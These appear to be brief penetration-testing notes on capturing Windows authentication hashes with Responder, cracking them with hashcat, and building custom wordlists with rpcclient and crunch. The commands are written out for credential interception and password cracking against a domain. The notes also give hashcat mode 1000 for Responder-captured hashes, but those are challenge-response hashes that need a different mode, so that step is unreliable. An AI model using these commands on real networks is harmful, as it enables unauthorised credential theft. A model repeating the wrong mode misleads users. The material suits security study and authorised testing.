Responder

If we have a payload which causes a connection back to our machine for a windows service (like SMB), we can listen for that and get the NTLM hash for the user attempting to connect:

responder -I [interface] -dP

With the resulting hash, we can use hashcat to attempt to crack it

The mode for NTLM hashes is 1000

The -a 0 flag tells hashcat we're using a wordlist

hashcat -m 1000 -a 0 [hashfile] [wordlist] -O

If we're not having success with any of the normal wordlists and we have lower access already, we can create custom wordlists for our target using rpcclient and crunch.

rpcclient> getdompwinfo

This can give us some basic rules about passwords on this domain - we can use this information to craft a password list with crunch

crunch [min] [max] -o my_wordlist.lst

• You can also use the -r option if you need to resume creating the list

• -t can specify patterns:

• Copy

  Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change.
   @ will insert lower case characters
   , will insert upper case characters
   % will insert numbers
   ^ will insert symbols

• look into the -f option as well for which charsets to include